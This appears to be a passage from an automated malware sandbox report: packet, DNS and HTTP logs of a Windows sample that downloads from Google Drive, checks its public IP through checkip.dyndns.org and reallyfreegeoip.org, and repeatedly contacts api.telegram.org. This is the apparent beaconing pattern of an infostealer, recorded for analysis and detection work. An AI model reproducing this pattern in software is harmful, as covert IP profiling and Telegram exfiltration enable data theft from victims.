                                                                                    Jan 10, 2025 21:42:00.462182999 CET50024443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:00.462191105 CET44350024149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:00.709445000 CET44350024149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:00.709536076 CET44350024149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:00.709618092 CET50024443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:00.710133076 CET50024443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:00.713121891 CET5002380192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:00.714291096 CET5002580192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:00.718683004 CET8050023132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:00.718775034 CET5002380192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:00.719762087 CET8050025132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:00.719877958 CET5002580192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:00.720055103 CET5002580192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:00.725796938 CET8050025132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:02.217138052 CET8050025132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:02.222345114 CET50026443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:02.222398043 CET44350026149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:02.222457886 CET50026443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:02.222812891 CET50026443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:02.222822905 CET44350026149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:02.272969007 CET5002580192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:02.829886913 CET44350026149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:02.831707954 CET50026443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:02.831774950 CET44350026149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:02.831837893 CET50026443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:02.831859112 CET44350026149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:03.304996014 CET44350026149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:03.307559967 CET44350026149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:03.307629108 CET50026443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:03.308073997 CET50026443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:03.311326981 CET5002580192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:03.312346935 CET5002780192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:03.316345930 CET8050025132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:03.316412926 CET5002580192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:03.317166090 CET8050027132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:03.317225933 CET5002780192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:03.317325115 CET5002780192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:03.322103977 CET8050027132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:04.154455900 CET8050027132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:04.156013966 CET50028443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:04.156064987 CET44350028149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:04.156156063 CET50028443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:04.156579971 CET50028443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:04.156594992 CET44350028149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:04.194948912 CET5002780192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:04.797461987 CET44350028149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:04.799295902 CET50028443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:04.799324989 CET44350028149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:04.799376011 CET50028443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:04.799384117 CET44350028149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:05.344127893 CET44350028149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:05.344224930 CET44350028149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:05.344345093 CET50028443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:05.344777107 CET50028443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:05.348279953 CET5002780192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:05.349452972 CET5002980192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:05.353859901 CET8050027132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:05.354000092 CET5002780192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:05.354293108 CET8050029132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:05.354388952 CET5002980192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:05.354499102 CET5002980192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:05.359323025 CET8050029132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:06.380877018 CET8050029132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:06.382162094 CET50030443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:06.382215023 CET44350030149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:06.382334948 CET50030443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:06.382767916 CET50030443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:06.382781029 CET44350030149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:06.429229021 CET5002980192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:07.006601095 CET44350030149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:07.009162903 CET50030443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:07.009186983 CET44350030149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:07.009253025 CET50030443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:07.009260893 CET44350030149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:07.250453949 CET44350030149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:07.250547886 CET44350030149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:07.250626087 CET50030443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:07.253832102 CET50030443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:07.289598942 CET5002980192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:07.294516087 CET8050029132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:07.294622898 CET5002980192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:07.300981998 CET5003180192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:07.305792093 CET8050031132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:07.305896997 CET5003180192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:07.306477070 CET5003180192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:07.311177969 CET8050031132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:08.975754976 CET8050031132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:08.976102114 CET8050031132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:08.976309061 CET5003180192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:08.976408005 CET8050031132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:08.977075100 CET5003180192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:08.977076054 CET5003180192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:08.978781939 CET50032443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:08.978822947 CET44350032149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:08.979244947 CET50032443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:08.979244947 CET50032443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:08.979273081 CET44350032149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:08.982351065 CET8050031132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:08.982820034 CET5003180192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:09.618999958 CET44350032149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:09.620995998 CET50032443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:09.621014118 CET44350032149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:09.621061087 CET50032443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:09.621068001 CET44350032149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:09.956157923 CET44350032149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:09.956252098 CET44350032149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:09.956314087 CET50032443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:10.003516912 CET50032443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:10.008671045 CET5003380192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:10.013756037 CET8050033132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:10.013864040 CET5003380192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:10.014390945 CET5003380192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:10.019233942 CET8050033132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:10.871510983 CET8050033132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:10.872766018 CET50034443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:10.872819901 CET44350034149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:10.872880936 CET50034443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:10.873150110 CET50034443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:10.873166084 CET44350034149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:10.913558960 CET5003380192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:11.532707930 CET44350034149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:11.534563065 CET50034443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:11.534590960 CET44350034149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:11.534688950 CET50034443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:11.534696102 CET44350034149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:11.868375063 CET44350034149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:11.868465900 CET44350034149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:11.868567944 CET50034443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:11.869158983 CET50034443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:11.871681929 CET5003380192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:11.872935057 CET5003580192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:11.876705885 CET8050033132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:11.877060890 CET5003380192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:11.877705097 CET8050035132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:11.877785921 CET5003580192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:11.878213882 CET5003580192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:11.883060932 CET8050035132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:13.090872049 CET8050035132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:13.092283964 CET50036443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:13.092340946 CET44350036149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:13.092420101 CET50036443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:13.092713118 CET50036443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:13.092729092 CET44350036149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:13.132415056 CET5003580192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:13.711035013 CET44350036149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:13.712809086 CET50036443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:13.712843895 CET44350036149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:13.712992907 CET50036443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:13.713000059 CET44350036149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:13.974138021 CET44350036149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:13.974261999 CET44350036149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:13.974349976 CET50036443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:13.974786997 CET50036443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:13.979644060 CET5003780192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:13.984472036 CET8050037132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:13.984575033 CET5003780192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:13.984704018 CET5003780192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:13.989439011 CET8050037132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:14.813391924 CET8050037132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:14.814799070 CET50038443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:14.814825058 CET44350038149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:14.814980030 CET50038443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:14.815201998 CET50038443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:14.815212011 CET44350038149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:14.866772890 CET5003780192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:15.427823067 CET44350038149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:15.429642916 CET50038443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:15.429672003 CET44350038149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:15.429729939 CET50038443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:15.429738998 CET44350038149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:15.775634050 CET44350038149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:15.775718927 CET44350038149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:15.775849104 CET50038443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:15.776391983 CET50038443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:15.779865980 CET5003780192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:15.780585051 CET5003980192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:15.784857988 CET8050037132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:15.784957886 CET5003780192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:15.785347939 CET8050039132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:15.785418034 CET5003980192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:15.785559893 CET5003980192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:15.790322065 CET8050039132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:16.615860939 CET8050039132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:16.623238087 CET50040443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:16.623281002 CET44350040149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:16.623306036 CET5003580192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:16.623358011 CET50040443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:16.623743057 CET4975080192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:16.623826027 CET50040443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:16.623842955 CET44350040149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:16.663578987 CET5003980192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:17.257731915 CET44350040149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:17.260262966 CET50040443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:17.260276079 CET44350040149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:17.260325909 CET50040443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:17.260332108 CET44350040149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:17.647079945 CET44350040149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:17.647161961 CET44350040149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:17.647325039 CET50040443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:17.648277998 CET50040443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:17.651798964 CET5003980192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:17.653079987 CET5004180192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:17.656824112 CET8050039132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:17.656905890 CET5003980192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:17.657857895 CET8050041132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:17.657943010 CET5004180192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:17.658076048 CET5004180192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:17.662832975 CET8050041132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:19.500050068 CET8050041132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:19.507417917 CET50042443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:19.507462978 CET44350042149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:19.507819891 CET50042443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:19.507819891 CET50042443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:19.507858992 CET44350042149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:19.554203987 CET5004180192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:20.134785891 CET44350042149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:20.136687040 CET50042443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:20.136714935 CET44350042149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:20.136779070 CET50042443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:20.136785030 CET44350042149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:20.575767040 CET44350042149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:20.575870037 CET44350042149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:20.575948954 CET50042443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:20.576462030 CET50042443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:20.579492092 CET5004180192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:20.580657959 CET5004380192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:20.584461927 CET8050041132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:20.584539890 CET5004180192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:20.585452080 CET8050043132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:20.585520983 CET5004380192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:20.585624933 CET5004380192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:20.590475082 CET8050043132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:21.412628889 CET8050043132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:21.460448980 CET5004380192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:24.342787027 CET50044443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:24.342837095 CET44350044149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:24.343193054 CET50044443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:24.343194008 CET50044443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:24.343229055 CET44350044149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:24.948487043 CET44350044149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:24.950273991 CET50044443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:24.950299025 CET44350044149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:24.950340033 CET50044443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:24.950351000 CET44350044149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:25.228914976 CET44350044149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:25.228996992 CET44350044149.154.167.220192.168.2.9
                                                                                    Jan 10, 2025 21:42:25.229037046 CET50044443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:25.229499102 CET50044443192.168.2.9149.154.167.220
                                                                                    Jan 10, 2025 21:42:25.234638929 CET5004580192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:25.239454985 CET8050045132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:25.239520073 CET5004580192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:25.239631891 CET5004580192.168.2.9132.226.8.169
                                                                                    Jan 10, 2025 21:42:25.244362116 CET8050045132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:26.085143089 CET8050045132.226.8.169192.168.2.9
                                                                                    Jan 10, 2025 21:42:26.132373095 CET5004580192.168.2.9132.226.8.169
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 10, 2025 21:41:01.925976992 CET6058453192.168.2.91.1.1.1
                                                                                    Jan 10, 2025 21:41:01.932800055 CET53605841.1.1.1192.168.2.9
                                                                                    Jan 10, 2025 21:41:04.111629009 CET5151553192.168.2.91.1.1.1
                                                                                    Jan 10, 2025 21:41:04.118814945 CET53515151.1.1.1192.168.2.9
                                                                                    Jan 10, 2025 21:41:08.032238960 CET5804053192.168.2.91.1.1.1
                                                                                    Jan 10, 2025 21:41:08.040484905 CET53580401.1.1.1192.168.2.9
                                                                                    Jan 10, 2025 21:41:10.894087076 CET6353553192.168.2.91.1.1.1
                                                                                    Jan 10, 2025 21:41:10.905711889 CET53635351.1.1.1192.168.2.9
                                                                                    Jan 10, 2025 21:41:17.323833942 CET6159753192.168.2.91.1.1.1
                                                                                    Jan 10, 2025 21:41:17.330606937 CET53615971.1.1.1192.168.2.9
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Jan 10, 2025 21:41:01.925976992 CET192.168.2.91.1.1.10x9fd5Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:04.111629009 CET192.168.2.91.1.1.10xe5f2Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:08.032238960 CET192.168.2.91.1.1.10x7606Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:10.894087076 CET192.168.2.91.1.1.10xf35eStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:17.323833942 CET192.168.2.91.1.1.10xaa89Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Jan 10, 2025 21:41:01.932800055 CET1.1.1.1192.168.2.90x9fd5No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:04.118814945 CET1.1.1.1192.168.2.90xe5f2No error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:08.040484905 CET1.1.1.1192.168.2.90x7606No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:08.040484905 CET1.1.1.1192.168.2.90x7606No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:08.040484905 CET1.1.1.1192.168.2.90x7606No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:08.040484905 CET1.1.1.1192.168.2.90x7606No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:08.040484905 CET1.1.1.1192.168.2.90x7606No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:08.040484905 CET1.1.1.1192.168.2.90x7606No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:10.905711889 CET1.1.1.1192.168.2.90xf35eNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:10.905711889 CET1.1.1.1192.168.2.90xf35eNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:10.905711889 CET1.1.1.1192.168.2.90xf35eNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:10.905711889 CET1.1.1.1192.168.2.90xf35eNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:10.905711889 CET1.1.1.1192.168.2.90xf35eNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:10.905711889 CET1.1.1.1192.168.2.90xf35eNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:10.905711889 CET1.1.1.1192.168.2.90xf35eNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                    Jan 10, 2025 21:41:17.330606937 CET1.1.1.1192.168.2.90xaa89No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                    • drive.google.com
                                                                                    • drive.usercontent.google.com
                                                                                    • reallyfreegeoip.org
                                                                                    • api.telegram.org
                                                                                    • checkip.dyndns.org
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.949711132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:08.050080061 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:10.179828882 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                    Jan 10, 2025 21:41:10.190351009 CET127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
